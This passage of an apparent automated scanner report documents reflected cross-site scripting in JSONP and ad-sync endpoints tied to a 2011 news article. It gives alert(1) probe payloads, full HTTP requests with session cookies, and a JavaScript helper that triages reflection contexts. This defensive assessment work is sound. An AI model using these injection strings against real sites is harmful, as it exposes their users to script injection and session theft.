*/

2.71. http://lingows.appspot.com/bubble/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the request_id request parameter is copied into a double-quoted JSON string value ("key": "...") inside a JSONP-style response served as text/javascript, not into HTML text between tags as the scanner's default wording suggests. The payload f9e6d<img%20src%3da%20onerror%3dalert(1)>5f177f5c0b0 was submitted in the request_id parameter. This input was echoed as f9e6d<img src=a onerror=alert(1)>5f177f5c0b0 in the application's response.

Inside a JavaScript string literal an <img> tag is inert, and the text/javascript Content-Type means a browser will not render the response as HTML, so this payload does not run as served. What the test shows is that the value is not encoded for HTML; it does not show a JavaScript string breakout, because the probe contains no double quote or backslash. A manual retest with a quote in request_id is needed to decide whether this is a script injection, and the response should in any case carry X-Content-Type-Options: nosniff.

Request

GET /bubble/?request_id=gannettf9e6d<img%20src%3da%20onerror%3dalert(1)>5f177f5c0b0&respond_path=LINGO.connect&try=1&format=ping&key=gannett&lm=1304974956000&url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&title=Monday%27s%20TV%20Talk%20Show%20Lineup%20%7C%20The%20Courier-Journal%20%7C%20courier-journal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
content-type: text/javascript
Date: Mon, 09 May 2011 16:04:31 GMT
Server: Google Frontend
Content-Length: 119

LINGO.connect.respond( {"status": "ok", "content": {}, "key": "gannettf9e6d<img src=a onerror=alert(1)>5f177f5c0b0"} );

2.72. http://lingows.appspot.com/bubble/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the respond_path request parameter is emitted as bare JavaScript code: it is the dotted name of the object whose respond() method the JSONP-style response calls (LINGO.connect.respond(...)), served as text/javascript. The payload ef298<script>alert(1)</script>ad47c31e778 was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This demonstrates that the caller-supplied name is not validated, which makes it an arbitrary JavaScript injection point of the same kind as 2.64: anything valid where an identifier is expected runs when the response is loaded as a script. The <script> probe itself is a syntax error in that position and would only execute if the response were rendered as HTML, which its Content-Type does not invite; a payload of the 2.64 form (statement terminator followed by JavaScript) is the appropriate manual retest.

Request

GET /bubble/?request_id=gannett&respond_path=LINGO.connectef298<script>alert(1)</script>ad47c31e778&try=1&format=ping&key=gannett&lm=1304974956000&url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&title=Monday%27s%20TV%20Talk%20Show%20Lineup%20%7C%20The%20Courier-Journal%20%7C%20courier-journal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
content-type: text/javascript
Date: Mon, 09 May 2011 16:04:34 GMT
Server: Google Frontend
Content-Length: 116

LINGO.connectef298<script>alert(1)</script>ad47c31e778.respond( {"status": "ok", "content": {}, "key": "gannett"} );

2.73. http://odb.outbrain.com/utils/odb [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The value of the callback request parameter is emitted as the bare name of the JSONP callback that wraps the response object, in a response served as text/x-json, not as HTML text between tags. The payload 6ac5e<script>alert(1)</script>45d8609092f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

The unvalidated callback name is an arbitrary JavaScript injection point whenever the response is evaluated as a script; the <script> probe itself is a syntax error in that position and would only execute if a browser rendered the response as HTML. text/x-json is not a standard type: the response should be served as application/javascript with X-Content-Type-Options: nosniff, and the callback restricted to identifier characters.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.init6ac5e<script>alert(1)</script>45d8609092f&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304955483598; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 16:04:04 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJuovDP7yNbVX0w=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 16:04:04 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBplQhW0LT5kd7o="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 04:52:04 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 16:04:04 GMT; Path=/
Set-Cookie: recs="qo4bJGYTzGZe1ZsYUgv8jQOjWG3a6NRfoww4hfrpispWIsyhZ6XIsSSLUQtsXg4wvtGCrFMJwUc="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 16:09:04 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:03 GMT
Content-Length: 4074

GEL.thepage.pageinfo.outbrain.init6ac5e<script>alert(1)</script>45d8609092f({'response':{'exec_time':29,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204204935','req_id':'42e0176f46c656af057660e153efea1a'},'score':{'preferred':'average','personal':{'score'
...[SNIP]...

2.74. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks: the string is the argument of a document.write() call that builds an <img> tag whose src is the callback URL. The payload 615ca'%3balert(1)//c117bcd8f02 was submitted in the admeld_callback parameter. This input was echoed as 615ca';alert(1)//c117bcd8f02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the quote closes the string literal, alert(1) runs as a statement of its own, and // discards the rest of the line. The same sink also deserves a check for HTML injection, since anything that stays inside the string literal is handed to document.write() as markup.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The admeld_callback value is a URL the partner is expected to supply, so it should be checked against an allowlist of expected match hosts; if it must still be echoed, it needs encoding for both the JavaScript string literal and the HTML attribute that document.write() produces from it.
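A triage helper, added here as an example and not part of this report or of the scanner that produced it: given a response Content-Type, its body and the reflected probe, it reports the lexical context the probe landed in and whether the reflection can execute as served. The samples are cut from the response excerpts printed above (2.63, 2.64, 2.68, 2.70, 2.71, 2.72 and this finding), shortened to the part around the reflection; the context names and verdict strings are this example's own.

```javascript
// Added triage helper, not part of the report or of Burp Scanner. Classifies
// the lexical context a reflected probe landed in and says whether the
// reflection can run code as served, which is the question the scanner's
// default "plain text between tags" label does not answer.

// Lexical state of JavaScript source at offset `end`. Tracks strings, template
// literals and comments only; regex literals are not tracked, so a probe that
// sits inside one would be reported as code (a deliberate simplification).
function jsStateAt(src, end) {
  let state = 'code';
  for (let i = 0; i < end; i++) {
    const c = src[i];
    const n = src[i + 1];
    if (state === 'code') {
      if (c === '/' && n === '*') { state = 'block-comment'; i++; }
      else if (c === '/' && n === '/') state = 'line-comment';
      else if (c === "'") state = 'single';
      else if (c === '"') state = 'double';
      else if (c === '`') state = 'template';
    } else if (state === 'block-comment') {
      if (c === '*' && n === '/') { state = 'code'; i++; }
    } else if (state === 'line-comment') {
      if (c === '\n') state = 'code';
    } else if (c === '\\') {
      i++; // escaped character inside a string literal
    } else if ((state === 'single' && c === "'") ||
               (state === 'double' && c === '"') ||
               (state === 'template' && c === '`')) {
      state = 'code';
    }
  }
  return state;
}

// Content types that are evaluated as script (JSON-ish JSONP carriers included).
const SCRIPT_TYPES = /^\s*(?:application|text)\/(?:x-)?(?:javascript|ecmascript|json)\b/i;

function classifyReflection(contentType, body, probe) {
  const at = body.indexOf(probe);
  if (at < 0) return { reflected: false };
  const servedAsHtml = /^\s*text\/html\b/i.test(contentType);
  const before = body.slice(0, at);
  let context;
  if (servedAsHtml) {
    const lower = before.toLowerCase();
    const open = lower.lastIndexOf('<script');
    if (open > lower.lastIndexOf('</script')) {
      // Inside an inline script element: classify the script body so far.
      const start = before.indexOf('>', open) + 1;
      context = 'html-script/' + jsStateAt(before.slice(start), before.length - start);
    } else if (before.lastIndexOf('<') > before.lastIndexOf('>')) {
      context = 'html-tag';
    } else {
      context = 'html-text';
    }
  } else if (SCRIPT_TYPES.test(contentType)) {
    context = 'js/' + jsStateAt(before, before.length);
  } else {
    context = 'other';
  }

  const tagPayload = /<[a-z]/i.test(probe);
  let verdict;
  if (context === 'html-text' || context === 'html-tag') verdict = 'html-injection';
  else if (servedAsHtml && /<\/script/i.test(probe)) verdict = 'html-injection'; // closes the inline script
  else if (context.endsWith('comment')) verdict = 'inert-in-comment';
  else if (context === 'other') verdict = 'manual-review';
  else if (tagPayload) verdict = 'tag-payload-in-script-context'; // syntax error as JS; retest with a JS payload
  else verdict = 'js-injection';
  return { reflected: true, context, servedAsHtml, verdict };
}

// Constructed samples, each cut from a response excerpt printed in this report.
const SAMPLES = {
  intellitxtQuery: { contentType: 'application/x-javascript',
    body: "$iTXT.js.serverUrl='http://courier-journal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10323&29370'-alert(1)-'92fd6a1d6eb=1';",
    probe: "29370'-alert(1)-'92fd6a1d6eb" },
  intellitxtCallback: { contentType: 'application/x-javascript',
    body: 'try{$iTXT.js.callback0952ab;alert(1)//326c748cb10({"requiresContextualization":1});}catch(e){}',
    probe: '952ab;alert(1)//326c748cb10' },
  barons: { contentType: 'text/html',
    body: '<pre>array(5) {\n["controller"]=>\nstring(5) "offer"\n["action"]=>\nstring(4) "feed"\n["qc3e53<img src=a onerror=alert(1)>033dd735ca1"]=>\n',
    probe: 'c3e53<img src=a onerror=alert(1)>033dd735ca1' },
  revsci: { contentType: 'application/javascript;charset=ISO-8859-1',
    body: '/*\n* JavaScript include error:\n* The customer code "B08725FE24B<SCRIPT>ALERT(1)</SCRIPT>8757376E56B" was not recognized.\n*/\n',
    probe: 'FE24B<SCRIPT>ALERT(1)</SCRIPT>8757376E56B' },
  lingowsKey: { contentType: 'text/javascript',
    body: 'LINGO.connect.respond( {"status": "ok", "content": {}, "key": "gannettf9e6d<img src=a onerror=alert(1)>5f177f5c0b0"} );',
    probe: 'f9e6d<img src=a onerror=alert(1)>5f177f5c0b0' },
  lingowsPath: { contentType: 'text/javascript',
    body: 'LINGO.connectef298<script>alert(1)</script>ad47c31e778.respond( {"status": "ok", "content": {}, "key": "gannett"} );',
    probe: 'ef298<script>alert(1)</script>ad47c31e778' },
  invitemedia: { contentType: 'text/javascript',
    body: `document.write('<img width="0" height="0" src="http://tag.admeld.com/match615ca';alert(1)//c117bcd8f02?admeld_adprovider_id=300">');`,
    probe: "615ca';alert(1)//c117bcd8f02" },
};

function triageAll() {
  const out = {};
  for (const name of Object.keys(SAMPLES)) {
    const s = SAMPLES[name];
    out[name] = classifyReflection(s.contentType, s.body, s.probe);
  }
  return out;
}

console.log(triageAll());
```

Run as-is, the helper separates the findings on this page into three groups: HTML text in a text/html error page (barons), a genuine script-context injection where the probe breaks the enclosing literal or stands as code (the IntelliTXT and invitemedia samples), and reflections that the scanner rated "Certain" but that cannot execute as served (the revsci comment and the two lingows tag probes inside a JavaScript response).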

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match615ca'%3balert(1)//c117bcd8f02 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; dps2b=; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw=="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 
22489+ 70760+ 139]+ \"619519\": [1304955500+ \"4634997524033340755\"+ 4451+ 6017+ 2]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1304955428+ \"5056308203649640923\"+ 4451+ 6017+ 2]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuGYcpZVgFHizZQF71gUGDXO7F34jsWA0QLM55LhWAmUZZJYApV90gKRBfO5JDiufGYByj6dAJJl0GAAyoDZQH0XPjABZR6DZZg07mxeCtTHZHEHKvv9GzPQzv/P5oNN/X8cYiqYD5SdfQMk+xwq2z5/AVgWzOcS4bh3AOSiLRd+vYXYyWDBABR9BXbJs0U/UERXzAf5bXLfaRTRnfdB5s+avxYhCgC7o1vH"; io_freq_p1="eJzjEuZYEynAKPFmyoJ3LAaMFmCaS5zjaoQAk8QSEEeBQYMBKLEEKnE8UIBF4ukEhASYDZTYbQ3U8RguwWRxByqxwAUo8f/ZfLjEcxCbS5hjvStQYsuFX28hEgwWDEDBbaFA10zuO40iuNcFKDhr/lqEIAByuzer"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 16:03:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 16:03:23 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 536

document.write('<img width="0" height="0" src="http://tag.admeld.com/match615ca';alert(1)//c117bcd8f02?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305389023&custom_user_segments=%2C11265%2C49026%2C49027%2C8%2C50185%2C4625%2C45714%2C6551%2C48153%2C48156%2C4
...[SNIP]...

2.75. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64dae<script>alert(1)</script>1de30274018 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=948951&cmp=996492&plc=319082770&sid=761056&num=5&ver=2&dv_url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&callback=__verify_callback_39063242380564dae<script>alert(1)</script>1de30274018 HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RJOffplIg_1080158746.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA&ei=ADMELD&wp_exchange=0.80&euid=YWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5&slotid=NDQ1NTgyNQ&fiu=MEZTWjhURzVYTQ&ciu=MFJKT2ZmcGxJZw&reqid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2Ix&ccw=SUFCWDMwIzAuMDQ5NzM2MTl8SUFCMTIjMC4xMTIxNTUxfElBQjE0IzAuMDQwODg3Ng&epid=QU02MTA&esid=QU0xNjM3&bp=801&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=&v=0&geo=VVN8VFh8NjIzfDc1MjA3&s=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2Ffeatures07%2F305090030%2Fmonday-s-tv-talk-show-lineup%3Fodyssey%3Dmod%257cnewswell%257ctext%257chome%257cs&refurl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 74

__verify_callback_39063242380564dae<script>alert(1)</script>1de30274018(2)

2.76. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpcb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.courier-journal.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload 517be<script>alert(1)</script>0aafd293039 was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110509.courier-journal.B2305090030.article.FEATURES07%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb517be<script>alert(1)</script>0aafd293039&jpctx=request_0 HTTP/1.1
Host: sitelife.courier-journal.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A13H%2Cplacementid%3A1273038%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273039/0/0/ADTECH%253Balias%253Dky-louisville.courier-journal.com/life/television/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D66339%253Bmisc%253D1304956996013%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305003797; indystarprod=R3316910632; bar-notdark=1

Response

HTTP/1.1 200 OK
Set-Cookie: indystarprod=R3316910632; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 16:04:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm207l3pluckcom
Set-Cookie: SiteLifeHost=l3vm207l3pluckcom; domain=courier-journal.com; path=/
Set-Cookie: anonId=91d2f37d-aa7f-4959-9178-7910d5256105; domain=courier-journal.com; expires=Tue, 08-May-2012 16:04:23 GMT; path=/
Date: Mon, 09 May 2011 16:04:22 GMT
Content-Length: 3062

PluckSDKjpcb517be<script>alert(1)</script>0aafd293039({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110509.courier-journal.B2
...[SNIP]...

2.77. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.courier-journal.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload d10a0<script>alert(1)</script>d403d598350 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110509.courier-journal.B2305090030.article.FEATURES07%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0d10a0<script>alert(1)</script>d403d598350 HTTP/1.1
Host: sitelife.courier-journal.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A13H%2Cplacementid%3A1273038%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273039/0/0/ADTECH%253Balias%253Dky-louisville.courier-journal.com/life/television/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D66339%253Bmisc%253D1304956996013%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305003797; indystarprod=R3316910632; bar-notdark=1

Response

HTTP/1.1 200 OK
Set-Cookie: indystarprod=R3316910632; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 16:04:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm207l3pluckcom
Set-Cookie: SiteLifeHost=l3vm207l3pluckcom; domain=courier-journal.com; path=/
Set-Cookie: anonId=af5da7d2-00d4-485f-af67-234ed442bba6; domain=courier-journal.com; expires=Tue, 08-May-2012 16:04:25 GMT; path=/
Date: Mon, 09 May 2011 16:04:24 GMT
Content-Length: 3062

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110509.couri
...[SNIP]...
al.ArticleResponse\",\r\n \"ResponseStatus\": {\r\n \"StatusCode\": \"OK\",\r\n \"Exceptions\": [],\r\n \"ObjectType\": \"Models.System.ResponseStatus\"\r\n }\r\n}"
}
]
